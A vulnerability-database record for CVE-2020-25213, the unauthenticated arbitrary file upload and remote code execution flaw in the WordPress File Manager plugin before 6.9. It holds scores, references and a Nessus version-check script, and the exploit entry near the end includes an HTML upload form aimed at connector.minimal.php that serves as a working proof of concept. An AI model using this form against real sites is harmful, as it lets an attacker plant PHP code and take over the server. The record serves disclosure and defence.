ID CVE-2020-25213 Type cve Reporter cve@mitre.org Modified 2020-09-14T20:57:00
Description
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
{"lastseen": "2020-10-03T12:55:53", "references": ["https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://github.com/w4fz5uck5/wp-file-manager-0day", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:webdesi9:file_manager:6.9:*:*:*:*:wordpress:*:*", "versionEndExcluding": "6.9", "vulnerable": true}], "operator": "OR"}]}, "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.", "edition": 4, "reporter": "cve@mitre.org", "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "published": "2020-09-09T16:15:00", "title": "CVE-2020-25213", "type": "cve", "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "wpexploit", "idList": ["WPEX-ID:10389"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:10389"]}], "modified": "2020-10-03T12:55:53", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-10-03T12:55:53", "rev": 2}, "vulnersScore": 6.3}, "cwe": ["CWE-434"], "bulletinFamily": "NVD", "affectedSoftware": [{"cpeName": "webdesi9:file_manager", "name": "webdesi9 file manager", "operator": "lt", "version": "6.9"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-14T20:57:00", "cpe": [], "id": "CVE-2020-25213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25213", "viewCount": 17, "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}
{"wpvulndb": [{"lastseen": "2020-10-05T11:53:48", "bulletinFamily": "software", "cvelist": ["CVE-2020-25213"], "description": "WordPress Vulnerability - File Manager < 6.9 - Arbitrary File Upload leading to RCE \n\n### PoC\n\nhttps://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py \n \n\n", "modified": "2020-10-05T00:00:00", "published": "2020-09-01T00:00:00", "id": "WPVDB-ID:10389", "href": "https://wpvulndb.com/vulnerabilities/10389", "type": "wpvulndb", "title": "File Manager < 6.9 - Arbitrary File Upload leading to RCE", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-22T10:55:37", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-09-04T00:00:00", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-25213"], "modified": "2020-09-04T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/21\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2020-10-05T11:53:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-25213"], "description": "WordPress Vulnerability - File Manager < 6.9 - Arbitrary File Upload leading to RCE\n", "modified": "2020-10-05T00:00:00", "published": "2020-09-01T00:00:00", "id": "WPEX-ID:10389", "href": "", "type": "wpexploit", "title": "File Manager < 6.9 - Arbitrary File Upload leading to RCE", "sourceData": "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py\r\n\r\n<html>\r\n<body>\r\n <form method=\"POST\" enctype=\"multipart/form-data\" action=\"https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"upload\"/>\r\n <input type=\"hidden\" name=\"target\" value=\"l1_Lw\"/>\r\n <input type=\"file\" name=\"upload[]\"/><br/><br/>\r\n <input type=\"submit\" value=\"Upload\"/>\r\n </form>\r\n</body>", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
